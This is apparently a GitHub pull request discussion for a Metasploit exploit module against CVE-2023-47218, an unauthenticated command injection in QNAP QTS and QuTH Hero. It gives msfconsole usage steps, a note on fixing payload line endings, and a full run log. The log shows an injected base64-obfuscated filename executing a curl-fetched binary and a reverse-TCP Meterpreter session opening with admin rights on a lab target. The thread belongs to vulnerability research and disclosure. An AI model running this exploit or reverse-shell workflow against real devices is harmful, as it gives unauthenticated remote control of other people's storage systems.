Exploit module for CVE-2023-47218 in QNAP QTS and QuTH Hero

[sfewer-r7]

This pull request is for a module targeting CVE-2023-47218, an unauthenticated command injection vuln affecting QNAP QTS and QuTH Hero.

Our Rapid7 disclosure has an analysis of the vuln as well as a standalone PoC. During analysis I was emulating the firmware, instructions on how to do this are in the blog post.

Verification Steps

1. Start msfconsole
2. Do: use linux/http/qnap_qts_rce_cve_2023_47218
3. Set the following options: RHOST, RPORT, LHOST and FETCH_SRVPORT if 8080 is already in use.
4. Run the module
5. Receive a Meterpreter session as the admin user.

[jheysel-r7]

For context - when using Rex::MIME::Message, after adding all the parts to the object you have to call .to_s before sending it in your post request. The to_s function calls force_crlf on all the parts of the message if a transfer encoding is not set. So although the content of the request isn't binary (there might be a better transfer encoding value that can be used here) if we don't set it, the line feeds in the bootstrap script get forced to CRLFs and the payload fails to run.

[bwatters-r7]

@jheysel-r7 did you want to grab this; I think you were working with the target? If not, I'm happy to take it.

[jheysel-r7]

Thanks for the offer @bwatters-r7! I got this one. Also thank you for the great module @sfewer-r7 🙏

Testing was as expected, landing now:

msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > options

Module options (exploit/linux/http/qnap_qts_rce_cve_2023_47218):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.199.130   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      WIWafvHTsLd      no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8082             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /mnt/update      yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (3045380 bytes) to 172.16.199.130
[+] Deleted /mnt/update/KT8peOfE
[+] Deleted /mnt/update/"$($(echo -n YmFzaCAvbW50L3VwZGF0ZS9LVDhwZU9mRQ==|base64 -d))"
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:56302) at 2024-02-21 08:43:50 -0800

meterpreter > getuid
Server username: admin
meterpreter > sysinfo
Computer     : 172.16.199.130
OS           :  (Linux 6.5.0-17-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[jheysel-r7]

Release Notes

The PR adds a module targeting CVE-2023-47218, an unauthenticated command injection vulnerability affecting QNAP QTS and QuTH Hero devices.